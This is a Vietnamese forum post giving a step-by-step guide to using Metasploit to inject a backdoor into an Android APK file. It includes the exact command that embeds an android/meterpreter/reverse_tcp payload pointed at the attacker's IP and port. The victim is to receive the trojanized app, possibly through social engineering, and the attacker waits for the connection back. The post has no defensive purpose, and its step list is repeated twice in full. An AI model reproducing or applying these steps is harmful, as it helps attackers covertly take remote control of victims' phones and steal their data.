maldet
VIP Members
-
31/08/2016
-
112
-
103 bài viết
[Metasploit] Chèn backdoor vào tập tin APK
Để cho ngắn gọn, hacker dùng Metasploit để inject backdoor vào một tập tin APK. Sau đó sẽ cài tập tin APK bị inject backdoor vào điện thoại Android của victim (có thể cài bằng nhiều cách, kể cả Social Engineering). Khi victim chạy ứng dụng đó lên, sẽ tự động mở kết nối tới máy tính của hacker.
Các bước thực hiện:
Bước 1: Cài đặt các gói sau với Terminal
apt-get install lib32stdc++6 lib32ncurses5 lib32z1
Bước 2: Tìm một tập tin APK dự định sẽ inject backdoor
Cái này thì không thiếu, các bạn có thể tìm trên Google rất nhiều.
Bước 3: Tải apk-embed-payload.rb ruby script
Tải tại đây.
Bước 4: Inject backdoor
ruby apk-embed-payload.rb tap_tin_apk_cua_ban.apk -p android/meterpreter/reverse_tcp LHOST=IP_cua_ban LPORT=PORT_cua_ban
Bước 5: Gửi tập tin đã inject cho victim và chờ kết nối tới
Chi tiết quá trình thực hiện trong video dưới đây.
Các bước thực hiện:
Bước 1: Cài đặt các gói sau với Terminal
apt-get install lib32stdc++6 lib32ncurses5 lib32z1
Bước 2: Tìm một tập tin APK dự định sẽ inject backdoor
Cái này thì không thiếu, các bạn có thể tìm trên Google rất nhiều.
Bước 3: Tải apk-embed-payload.rb ruby script
Tải tại đây.
Bước 4: Inject backdoor
ruby apk-embed-payload.rb tap_tin_apk_cua_ban.apk -p android/meterpreter/reverse_tcp LHOST=IP_cua_ban LPORT=PORT_cua_ban
Bước 5: Gửi tập tin đã inject cho victim và chờ kết nối tới
Chi tiết quá trình thực hiện trong video dưới đây.